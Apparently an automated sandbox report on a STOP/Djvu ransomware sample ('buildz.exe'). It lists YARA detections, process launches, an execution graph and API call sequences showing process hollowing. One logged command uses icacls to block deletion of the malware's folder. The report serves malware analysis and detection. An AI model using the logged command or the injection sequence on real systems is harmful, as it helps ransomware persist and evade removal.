                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2097760576.0000000000A2C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:10:26:01
                        Start date:05/10/2024
                        Path:C:\Users\user\Desktop\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\buildz.exe"
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:10:26:03
                        Start date:05/10/2024
                        Path:C:\Windows\SysWOW64\icacls.exe
                        Wow64 process (32bit):true
                        Commandline:icacls "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                        Imagebase:0xa70000
                        File size:29'696 bytes
                        MD5 hash:2E49585E4E08565F52090B144062F97E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:10:26:04
                        Start date:05/10/2024
                        Path:C:\Users\user\Desktop\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTask
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2188854432.0000000000A42000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        Target ID:5
                        Start time:10:26:06
                        Start date:05/10/2024
                        Path:C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe --Task
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2523332173.0000000000814000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        Antivirus matches:
                        • Detection: 91%, ReversingLabs
                        • Detection: 82%, Virustotal, Browse
                        Reputation:low
                        Has exited:true

                        Target ID:6
                        Start time:10:26:10
                        Start date:05/10/2024
                        Path:C:\Users\user\Desktop\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTask
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Target ID:8
                        Start time:10:26:13
                        Start date:05/10/2024
                        Path:C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2313135610.0000000000933000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        Target ID:10
                        Start time:10:26:21
                        Start date:05/10/2024
                        Path:C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Target ID:11
                        Start time:10:26:22
                        Start date:05/10/2024
                        Path:C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.2425231784.0000000000A2D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        Target ID:12
                        Start time:10:26:34
                        Start date:05/10/2024
                        Path:C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Target ID:15
                        Start time:10:26:43
                        Start date:05/10/2024
                        Path:C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe --Task
                        Imagebase:0x400000
                        File size:726'528 bytes
                        MD5 hash:B7CB7F2B5CD9BD047710650295DC88F7
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:false

                        Reset < >

                          Execution Graph

                          Execution Coverage:1.3%
                          Dynamic/Decrypted Code Coverage:31.4%
                          Signature Coverage:14.9%
                          Total number of Nodes:121
                          Total number of Limit Nodes:18
                          execution_graph 37005 2310000 37008 2310630 37005->37008 37007 2310005 37009 231064c 37008->37009 37011 2311577 37009->37011 37014 23105b0 37011->37014 37018 23105dc 37014->37018 37015 23105e2 GetFileAttributesA 37015->37018 37016 231061e 37018->37015 37018->37016 37019 2310420 37018->37019 37020 23104f3 37019->37020 37021 23104fa 37020->37021 37022 23104ff CreateWindowExA 37020->37022 37021->37018 37022->37021 37023 2310540 PostMessageA 37022->37023 37024 231055f 37023->37024 37024->37021 37026 2310110 VirtualAlloc GetModuleFileNameA 37024->37026 37027 2310414 37026->37027 37028 231017d CreateProcessA 37026->37028 37027->37024 37028->37027 37030 231025f VirtualFree VirtualAlloc Wow64GetThreadContext 37028->37030 37030->37027 37031 23102a9 ReadProcessMemory 37030->37031 37032 23102e5 VirtualAllocEx NtWriteVirtualMemory 37031->37032 37033 23102d5 NtUnmapViewOfSection 37031->37033 37034 231033b 37032->37034 37033->37032 37035 2310350 NtWriteVirtualMemory 37034->37035 37036 231039d WriteProcessMemory Wow64SetThreadContext ResumeThread 37034->37036 37035->37034 37037 23103fb ExitProcess 37036->37037 37039 a2c026 37040 a2c035 37039->37040 37043 a2c7c6 37040->37043 37044 a2c7e1 37043->37044 37045 a2c7ea CreateToolhelp32Snapshot 37044->37045 37046 a2c806 Module32First 37044->37046 37045->37044 37045->37046 37047 a2c815 37046->37047 37049 a2c03e 37046->37049 37050 a2c485 37047->37050 37051 a2c4b0 37050->37051 37052 a2c4c1 VirtualAlloc 37051->37052 37053 a2c4f9 37051->37053 37052->37053 37053->37053 37054 40130c 37100 403250 37054->37100 37056 401318 GetStartupInfoW 37057 40133b 37056->37057 37101 4025aa HeapCreate 37057->37101 37060 40138b 37111 405bbd 76 API calls 8 library calls 37060->37111 37063 401391 37064 401395 37063->37064 37065 40139d __RTC_Initialize 37063->37065 37112 4012e3 67 API calls 3 library calls 37064->37112 37103 40550d 72 API calls 2 library calls 37065->37103 37067 40139c 37067->37065 37069 4013aa 37070 4013b6 GetCommandLineW 37069->37070 37071 4013ae 37069->37071 37104 4054b0 69 API calls 2 library calls 37070->37104 37113 404b40 67 API calls 3 library calls 37071->37113 37074 4013b5 37074->37070 37075 4013c5 37114 405402 68 API calls 2 library calls 37075->37114 37077 4013cf 37078 4013d3 37077->37078 37079 4013db 37077->37079 37115 404b40 67 API calls 3 library calls 37078->37115 37105 4051d3 67 API calls 5 library calls 37079->37105 37082 4013da 37082->37079 37083 4013e0 37084 4013e4 37083->37084 37085 4013ec 37083->37085 37116 404b40 67 API calls 3 library calls 37084->37116 37106 404bff 74 API calls 5 library calls 37085->37106 37088 4013eb 37088->37085 37089 4013f2 37090 4013f7 37089->37090 37093 4013fe __wwincmdln 37089->37093 37117 404b40 67 API calls 3 library calls 37090->37117 37092 4013fd 37092->37093 37093->37092 37107 49de9a 37093->37107 37095 40141e 37096 40142c 37095->37096 37118 404db0 67 API calls _doexit 37095->37118 37119 404ddc 67 API calls _doexit 37096->37119 37099 401431 __ioinit 37100->37056 37102 40137f 37101->37102 37102->37060 37110 4012e3 67 API calls 3 library calls 37102->37110 37103->37069 37104->37075 37105->37083 37106->37089 37120 49dc5b 37107->37120 37109 49de9f 37109->37095 37110->37060 37111->37063 37112->37067 37113->37074 37114->37077 37115->37082 37116->37088 37117->37092 37118->37096 37119->37099 37121 49dc78 37120->37121 37122 49dcdb 7 API calls 37121->37122 37123 49dd56 37121->37123 37124 49dd3c 37122->37124 37125 49dd36 LoadLibraryA LoadLibraryA 37122->37125 37126 49dd5c GetCommMask SetLastError 37123->37126 37161 4011e0 69 API calls _vscanf 37124->37161 37125->37124 37128 49dd7e GetConsoleAliasesA 37126->37128 37129 49dd77 ZombifyActCtx 37126->37129 37128->37126 37131 49dd90 37128->37131 37129->37128 37130 49dd47 37162 4011fd 91 API calls __wcstoi64 37130->37162 37133 49dd9d OpenWaitableTimerW CreateWaitableTimerW 37131->37133 37150 49dde4 37131->37150 37163 40121e 105 API calls 7 library calls 37133->37163 37136 49ddcf 37164 40108c 67 API calls 7 library calls 37136->37164 37138 49dd4d 37138->37123 37140 49ddec LoadLibraryA 37156 49da0d 37140->37156 37141 49ddd5 37165 40111a 67 API calls 2 library calls 37141->37165 37145 49dddc 37166 40100f 103 API calls 3 library calls 37145->37166 37147 49de4a 37167 49dbd8 12 API calls __crtLCMapStringA_stat 37147->37167 37155 49d9d0 LocalAlloc 37150->37155 37151 49de4f 37152 49de8d 37151->37152 37168 401000 5 API calls __invoke_watson 37152->37168 37154 49de98 37154->37109 37155->37140 37157 49da4c 37156->37157 37158 49da58 GetModuleHandleW GetProcAddress 37157->37158 37159 49db2e 37157->37159 37158->37157 37160 49d9ef VirtualProtect 37159->37160 37160->37147 37161->37130 37162->37138 37163->37136 37164->37141 37165->37145 37166->37150 37167->37151 37168->37154

                          Control-flow Graph

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02310156
                          • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0231016C
                          • CreateProcessA.KERNELBASE(?,00000000), ref: 02310255
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02310270
                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02310283
                          • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0231029F
                          • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023102C8
                          • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 023102E3
                          • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02310304
                          • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0231032A
                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02310399
                          • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023103BF
                          • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 023103E1
                          • ResumeThread.KERNELBASE(00000000), ref: 023103ED
                          • ExitProcess.KERNEL32(00000000), ref: 02310412
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                          • String ID:
                          • API String ID: 93872480-0
                          • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                          • Instruction ID: b0587619feb7eb846c5b2a885c669f1cadfed82744092192e2c91a1c402f373f
                          • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                          • Instruction Fuzzy Hash: D8B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB391D771AD81CF94

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 99 a2c7c6-a2c7df 100 a2c7e1-a2c7e3 99->100 101 a2c7e5 100->101 102 a2c7ea-a2c7f6 CreateToolhelp32Snapshot 100->102 101->102 103 a2c806-a2c813 Module32First 102->103 104 a2c7f8-a2c7fe 102->104 105 a2c815-a2c816 call a2c485 103->105 106 a2c81c-a2c824 103->106 104->103 109 a2c800-a2c804 104->109 110 a2c81b 105->110 109->100 109->103 110->106
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A2C7EE
                          • Module32First.KERNEL32(00000000,00000224), ref: 00A2C80E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097760576.0000000000A2C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A2C000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a2c000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFirstModule32SnapshotToolhelp32
                          • String ID:
                          • API String ID: 3833638111-0
                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                          • Instruction ID: c27627bb2a2cb129939ab5058df96155eb8a2a2f0fc2f666fa02ddb8c30c0a69
                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                          • Instruction Fuzzy Hash: 0CF062322007206BD7203BB9BC8DA6E76E8AF49735F104638E642D14C0DB70E8454A61

                          Control-flow Graph

                          APIs
                          • lstrcatW.KERNEL32(?,00000000), ref: 0049DCE3
                          • InterlockedDecrement.KERNEL32(?), ref: 0049DCF0
                          • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0049DD07
                          • GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 0049DD10
                          • AreFileApisANSI.KERNEL32 ref: 0049DD16
                          • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 0049DD1E
                          • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 0049DD27
                          • LoadLibraryA.KERNEL32(00000000), ref: 0049DD37
                          • LoadLibraryA.KERNEL32(00000000), ref: 0049DD3A
                          • _wscanf.LIBCMT ref: 0049DD42
                          • GetCommMask.KERNELBASE(00000000,00000000), ref: 0049DD5E
                          • SetLastError.KERNEL32(00000000), ref: 0049DD65
                          • ZombifyActCtx.KERNEL32(00000000), ref: 0049DD78
                          • GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 0049DD87
                          • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0049DDAC
                          • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0049DDB5
                          • _printf.LIBCMT ref: 0049DDCA
                          • _calloc.LIBCMT ref: 0049DDD7
                            • Part of subcall function 0040111A: __calloc_impl.LIBCMT ref: 0040112F
                          • _sprintf.LIBCMT ref: 0049DDDF
                            • Part of subcall function 0049D9D0: LocalAlloc.KERNELBASE(00000000,0049DDEC), ref: 0049D9D8
                          • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 0049DE3E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: LibraryLoad$ConsoleTimerWaitable$AliasesAllocApisAtomCommCreateDateDecrementEnumErrorFileFormatsInterlockedLastLocalMaskMountNameOpenPointVolumeWriteZombify__calloc_impl_calloc_printf_sprintf_wscanflstrcat
                          • String ID: %s %c$VirtualProtect$k`$msimg32.dll$tl_$wepaguwitoze xalokelojuye %s %d %f$}$
                          • API String ID: 201217809-2696202027
                          • Opcode ID: fad9ff256d4b7bfda96e1f39686509cd8c6ac5f8bab7d8030433146ff437332d
                          • Instruction ID: a4b48b94c9553c4e14f96ed912e735d3d1b40b33ee694f5b9bd7338f6bac854c
                          • Opcode Fuzzy Hash: fad9ff256d4b7bfda96e1f39686509cd8c6ac5f8bab7d8030433146ff437332d
                          • Instruction Fuzzy Hash: 0351C170901530ABCF24EB66DD4999F3F68EF26354B10003BF505E2262DB7C9A46CBAD

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 73 2310420-23104f8 75 23104fa 73->75 76 23104ff-231053c CreateWindowExA 73->76 77 23105aa-23105ad 75->77 78 2310540-2310558 PostMessageA 76->78 79 231053e 76->79 80 231055f-2310563 78->80 79->77 80->77 81 2310565-2310579 80->81 81->77 83 231057b-2310582 81->83 84 2310584-2310588 83->84 85 23105a8 83->85 84->85 86 231058a-2310591 84->86 85->80 86->85 87 2310593-2310597 call 2310110 86->87 89 231059c-23105a5 87->89 89->85
                          APIs
                          • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02310533
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateWindow
                          • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                          • API String ID: 716092398-2341455598
                          • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                          • Instruction ID: aad243b58d3dbd4b9bb8c07b9128e22594ce9af9aa3b8a76e7dc0dbd60aedcac
                          • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                          • Instruction Fuzzy Hash: AA513A70D08388DEEB15CBE8C849BDDBFB6AF11708F144058D9447F286C3BA5658CB62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 90 23105b0-23105d5 91 23105dc-23105e0 90->91 92 23105e2-23105f5 GetFileAttributesA 91->92 93 231061e-2310621 91->93 94 2310613-231061c 92->94 95 23105f7-23105fe 92->95 94->91 95->94 96 2310600-231060b call 2310420 95->96 98 2310610 96->98 98->94
                          APIs
                          • GetFileAttributesA.KERNELBASE(apfHQ), ref: 023105EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2310000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID: apfHQ$o
                          • API String ID: 3188754299-2999369273
                          • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                          • Instruction ID: f40415482a24d46492d97d137132ae26c1da637fb552b0e39754e7c043e2196d
                          • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                          • Instruction Fuzzy Hash: 2A012170C0425CEEDF18DB98C5583AEBFB5AF41308F1480D9C8592B242D7769B98CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 112 4025aa-4025cc HeapCreate 113 4025d0-4025d9 112->113 114 4025ce-4025cf 112->114
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004025BF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: b068aa68e6376f86bdeee8206939370fd798391fd73c10dc48816a93e95e0e0e
                          • Instruction ID: 9fa7fbbf02b2878d9f92131aaaa07cd167f597d2cfc4ede1e9a654e2abff342e
                          • Opcode Fuzzy Hash: b068aa68e6376f86bdeee8206939370fd798391fd73c10dc48816a93e95e0e0e
                          • Instruction Fuzzy Hash: 9DD05E76550304AAEB109F756C087623BDCE794395F144436F80CC6590F6B4D591A518

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 115 49d9ef-49da0c VirtualProtect
                          APIs
                          • VirtualProtect.KERNELBASE(00000040,?), ref: 0049DA05
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097151386.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2097082680.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097348844.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097366037.00000000004A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2097398498.0000000000531000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_buildz.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 391d41fd12ea878b958439089802dcee8dae0454fdf1228e411983c7dcfadf8d
                          • Instruction ID: fe63f0b6d5a4f7e5898087e044f78ba62367b8e6a01d064841823370d2351f06
                          • Opcode Fuzzy Hash: 391d41fd12ea878b958439089802dcee8dae0454fdf1228e411983c7dcfadf8d
                          • Instruction Fuzzy Hash: 49C08C71200108FFCB118B81FD42E997FADEB1A244F100021B706A0071D672FA09AB58

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 116 a2c485-a2c4bf call a2c798 119 a2c4c1-a2c4f4 VirtualAlloc call a2c512 116->119 120 a2c50d 116->120 122 a2c4f9-a2c50b 119->122 120->120 122->120
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00A2C4D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2097760576.0000000000A2C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A2C000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a2c000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
